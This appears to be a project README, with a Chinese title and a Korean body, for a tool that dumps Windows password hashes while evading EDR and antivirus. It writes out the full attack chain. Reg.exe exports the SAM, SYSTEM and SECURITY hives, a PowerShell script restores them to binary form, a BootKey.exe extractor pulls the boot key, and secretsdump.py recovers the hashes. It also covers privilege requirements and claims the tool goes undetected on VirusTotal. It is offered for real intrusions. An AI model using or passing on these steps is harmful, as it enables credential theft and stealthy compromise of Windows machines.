
Windows绕过EDR实现DumpHash
시스템 화이트 프로그램 Reg.exe의 확장 적용을 통해 백신 소프트웨어의 차단 지점을 교묘하게 우회하여 EDR을 우회하고 Hash를 덤프하는 목적을 달성했습니다.
실제 테스트에 따르면 이 방법은 Windows 계열 시스템에 유효하며, 조작 난이도가 높지 않고 실전 가치가 있습니다.
이 프로젝트의 실전 관련 글:
글 게시 후 국내 및 해외 커뮤니티에서 동일한 아이디어를 찾지 못해 전 세계 최초 게시라고 생각했지만, 이후 팬들의 댓글에 따르면 이 아이디어는 이전에 해외 고수분이 공유한 적이 있습니다: Dumping LSA secrets: a story about task decorrelation
이 글의 소스 코드와 Release는 Github에 공개되어 있습니다. 공유가 쉽지 않으니, 괜찮다고 생각되시는 고수님들은 Star를 눌러주시면 정말 감사하겠습니다!
대상 시스템에서 명령을 실행하여 .reg 파일을 내보냅니다
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
1단계에서 내보낸 .reg 파일을 로컬 시스템에 다운로드한 후, 본 프로젝트의 RegReduction.ps1 PowerShell 스크립트를 실행하여 바이너리 파일을 복원합니다
.\RegReduction.ps1
참고: Github에서 스크립트를 다운로드하면 기본 인코딩이 UTF-8이므로, 메모장에서 ANSI(GB2312)로 변경해야 정상적으로 실행할 수 있습니다

대상 시스템에서 BootKey.exe 실행 프로그램을 실행합니다. 소스 코드는 본 프로젝트의 BootKey.c 파일입니다
BootKey.exe

백신 우회 테스트(2026.5.10): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

이 글에는 몇 가지 핵심 작업이 있는데, 대상 시스템에서의 핵심 단계는 두 가지입니다:
reg.exe export 명령을 사용하여 주요 레지스트리 내용을 내보냅니다;BootKey.exe를 사용하여 시스템의 BootKey를 내보냅니다.다양한 시스템에서도 테스트를 진행했으며, 결과는 다음과 같습니다:
reg.exe export 명령으로 레지스트리를 내보내려면 SYSTEM 권한이 필요하며, Windows Server 2022 이하 환경에서는 reg.exe export 명령으로 레지스트리를 내보낼 때 일반 관리자 권한만 있으면 됩니다(SYSTEM 권한은 필요 없음). reg.exe export 명령으로 레지스트리를 내보낸 후 파일 크기가 1KB에 불과하다면 권한이 부족하다는 뜻입니다.BootKey.exe 추출 프로그램으로 BootKey를 내보낼 때는 관리자 권한이 필요 없으며, 실제로 대부분의 백신 소프트웨어(현재까지 접한 백신은 모두)가 탐지하지 않습니다.